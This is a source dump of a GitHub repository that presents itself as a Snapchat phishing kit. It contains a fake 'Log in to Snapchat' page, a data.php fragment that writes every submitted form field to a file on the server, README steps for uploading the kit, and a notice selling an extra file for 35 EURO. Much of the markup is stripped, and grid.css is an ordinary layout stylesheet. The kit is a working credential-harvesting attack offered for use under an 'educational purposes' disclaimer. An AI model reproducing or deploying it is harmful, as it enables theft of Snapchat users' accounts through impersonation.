├── snappass.htm ├── lg.png ├── error.png ├── icons.png ├── favicon.png ├── gasd34sad3.png ├── O7nsdhjdsXSI.png ├── index.php ├── hwto ├── data.php ├── README.md ├── footer.php ├── content.php ├── header.php └── grid.css /snappass.htm: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /lg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1zu0/Snapchat-Phishing-Page/HEAD/lg.png -------------------------------------------------------------------------------- /error.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1zu0/Snapchat-Phishing-Page/HEAD/error.png -------------------------------------------------------------------------------- /icons.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1zu0/Snapchat-Phishing-Page/HEAD/icons.png -------------------------------------------------------------------------------- /favicon.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1zu0/Snapchat-Phishing-Page/HEAD/favicon.png -------------------------------------------------------------------------------- /gasd34sad3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1zu0/Snapchat-Phishing-Page/HEAD/gasd34sad3.png -------------------------------------------------------------------------------- /O7nsdhjdsXSI.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1zu0/Snapchat-Phishing-Page/HEAD/O7nsdhjdsXSI.png -------------------------------------------------------------------------------- /index.php: -------------------------------------------------------------------------------- 1 | 8 | 9 | -------------------------------------------------------------------------------- /hwto: -------------------------------------------------------------------------------- 1 | How to get the main.css? 2 | 3 | Price: 35 EURO - BTC/ETH 4 | 5 | New: Instant delivery 6 | https://shoppy.gg/product/qlndvzx 7 | 8 | After the payment you will instantly get the file via Email. 9 | Change the name of this file to main.css and upload it including all files from here to your server. 10 | -------------------------------------------------------------------------------- /data.php: -------------------------------------------------------------------------------- 1 | $value) { 5 | fwrite($handle, $variable); 6 | fwrite($handle, "="); 7 | fwrite($handle, $value); 8 | fwrite($handle, "
"); 9 | } 10 | fwrite($handle, "
"); 11 | fclose($handle); 12 | exit; 13 | ?> -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Snapchat-Phishing-Page by 1zu0 2 | The Responsive Phishing Page for Snapchat 2024 3 | 4 | 1. Change the ending of the file "hwto" to .txt and read... 5 | 6 | 2. Open data.php with an editor and change the redirected url to an error page 7 | 8 | 3. Simply upload the files to your server 9 | 10 | This is purely for the educational purposes and is not intended to hurt anyone 11 | 12 | 13 | 14 | 15 | -------------------------------------------------------------------------------- /footer.php: -------------------------------------------------------------------------------- 1 | 10 | 11 | 12 | -------------------------------------------------------------------------------- /content.php: -------------------------------------------------------------------------------- 1 |
2 |
3 |
4 |
5 |
6 | Log in to Snapchat 14 |
15 |

16 |
17 |
18 | 22 | 26 |
27 | 32 |
33 | 34 |
35 | 40 |
41 |
42 |
-------------------------------------------------------------------------------- /header.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | Login - Snapchat 13 | 14 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 43 | 46 | 47 | 48 | 49 | 50 |
51 | 58 |
-------------------------------------------------------------------------------- /grid.css: -------------------------------------------------------------------------------- 1 | html { 2 | box-sizing: border-box; 3 | font-size: 16px; 4 | } 5 | body { 6 | padding: 0; 7 | margin: 0; 8 | } 9 | 10 | *, 11 | *:before, 12 | *:after { 13 | box-sizing: inherit; 14 | } 15 | 16 | .container { 17 | width: 100%; 18 | padding-right: 15px; 19 | padding-left: 15px; 20 | margin-right: auto; 21 | margin-left: auto; 22 | } 23 | 24 | .container-fluid { 25 | width: 100%; 26 | padding-right: 15px; 27 | padding-left: 15px; 28 | margin-right: auto; 29 | margin-left: auto; 30 | } 31 | 32 | .container:before, 33 | .container:after, 34 | .container-fluid:before, 35 | .container-fluid:after, 36 | .row:before, 37 | .row:after { 38 | content: " "; 39 | display: table; 40 | } 41 | .container:after, 42 | .container-fluid:after, 43 | .row:after {clear: both;} 44 | 45 | [class*='col-']{ 46 | width: 100%; 47 | float: left; 48 | min-height: 1px; 49 | 50 | /*-- our gutter --*/ 51 | padding-right: 15px; 52 | padding-left: 15px; 53 | } 54 | 55 | 56 | [class*='col-'] img, [class*='col-'] video{ 57 | max-width: 100%; 58 | height: auto; 59 | } 60 | 61 | .box { 62 | background: rgba(86,61,124,.15); 63 | border-radius: 3px; 64 | border: 1px solid rgba(86,61,124,.2); 65 | color: #212529; 66 | text-align: center; 67 | padding: 15px; 68 | margin: 10px 0; 69 | font-size: 1rem; 70 | } 71 | 72 | 73 | .col-1 {width: 8.33333%;} 74 | .col-2 {width: 16.66667%;} 75 | .col-3 {width: 25%;} 76 | .col-4 {width: 33.33333%;} 77 | .col-5 {width: 41.66667%;} 78 | .col-6 {width: 50%;} 79 | .col-7 {width: 58.33333%;} 80 | .col-8 {width: 66.66667%;} 81 | .col-9 {width: 75%;} 82 | .col-10 {width: 83.33333%;} 83 | .col-11 {width: 91.66667%;} 84 | .col-12 {width: 100%;} 85 | 86 | /*Extra small devices (portrait phones, less than 576px)*/ 87 | @media (max-width: 575.98px) { 88 | 89 | html { 90 | font-size: 12px; 91 | } 92 | 93 | .container { 94 | max-width: 540px; 95 | } 96 | 97 | .col-xs-1 {width: 8.33333%;} 98 | .col-xs-2 {width: 16.66667%;} 99 | .col-xs-3 {width: 25%;} 100 | .col-xs-4 {width: 33.33333%;} 101 | .col-xs-5 {width: 41.66667%;} 102 | .col-xs-6 {width: 50%;} 103 | .col-xs-7 {width: 58.33333%;} 104 | .col-xs-8 {width: 66.66667%;} 105 | .col-xs-9 {width: 75%;} 106 | .col-xs-10 {width: 83.33333%;} 107 | .col-xs-11 {width: 91.66667%;} 108 | .col-xs-12 {width: 100%;} 109 | 110 | } 111 | 112 | 113 | /*Small devices (landscape phones, 576px and up)*/ 114 | @media all and (min-width:576px){ 115 | 116 | html { 117 | font-size: 13px; 118 | } 119 | 120 | .container { 121 | max-width: 540px; 122 | } 123 | 124 | .col-sm-1 {width: 8.33333%;} 125 | .col-sm-2 {width: 16.66667%;} 126 | .col-sm-3 {width: 25%;} 127 | .col-sm-4 {width: 33.33333%;} 128 | .col-sm-5 {width: 41.66667%;} 129 | .col-sm-6 {width: 50%;} 130 | .col-sm-7 {width: 58.33333%;} 131 | .col-sm-8 {width: 66.66667%;} 132 | .col-sm-9 {width: 75%;} 133 | .col-sm-10 {width: 83.33333%;} 134 | .col-sm-11 {width: 91.66667%;} 135 | .col-sm-12 {width: 100%;} 136 | 137 | } 138 | 139 | /*Medium devices (tablets, 768px and up)*/ 140 | @media all and (min-width:768px){ 141 | 142 | html { 143 | font-size: 14px; 144 | } 145 | 146 | .container { 147 | max-width: 720px; 148 | } 149 | 150 | .col-md-1 {width: 8.33333%;} 151 | .col-md-2 {width: 16.66667%;} 152 | .col-md-3 {width: 25%;} 153 | .col-md-4 {width: 33.33333%;} 154 | .col-md-5 {width: 41.66667%;} 155 | .col-md-6 {width: 50%;} 156 | .col-md-7 {width: 58.33333%;} 157 | .col-md-8 {width: 66.66667%;} 158 | .col-md-9 {width: 75%;} 159 | .col-md-10 {width: 83.33333%;} 160 | .col-md-11 {width: 91.66667%;} 161 | .col-md-12 {width: 100%;} 162 | 163 | } 164 | 165 | /*Large devices (desktops, 992px and up)*/ 166 | @media all and (min-width:992px){ 167 | 168 | html { 169 | font-size: 15px; 170 | } 171 | 172 | .container { 173 | max-width: 960px; 174 | } 175 | 176 | 177 | .col-lg-1 {width: 8.33333%;} 178 | .col-lg-2 {width: 16.66667%;} 179 | .col-lg-3 {width: 25%;} 180 | .col-lg-4 {width: 33.33333%;} 181 | .col-lg-5 {width: 41.66667%;} 182 | .col-lg-6 {width: 50%;} 183 | .col-lg-7 {width: 58.33333%;} 184 | .col-lg-8 {width: 66.66667%;} 185 | .col-lg-9 {width: 75%;} 186 | .col-lg-10 {width: 83.33333%;} 187 | .col-lg-11 {width: 91.66667%;} 188 | .col-lg-12 {width: 100%;} 189 | 190 | } 191 | 192 | 193 | /*Extra large devices (large desktops, 1200px and up)*/ 194 | @media (min-width: 1200px) { 195 | 196 | html { 197 | font-size: 16px; 198 | } 199 | 200 | .container { 201 | max-width: 1140px; 202 | } 203 | 204 | 205 | .col-xl-1 {width: 8.33333%;} 206 | .col-xl-2 {width: 16.66667%;} 207 | .col-xl-3 {width: 25%;} 208 | .col-xl-4 {width: 33.33333%;} 209 | .col-xl-5 {width: 41.66667%;} 210 | .col-xl-6 {width: 50%;} 211 | .col-xl-7 {width: 58.33333%;} 212 | .col-xl-8 {width: 66.66667%;} 213 | .col-xl-9 {width: 75%;} 214 | .col-xl-10 {width: 83.33333%;} 215 | .col-xl-11 {width: 91.66667%;} 216 | .col-xl-12 {width: 100%;} 217 | } --------------------------------------------------------------------------------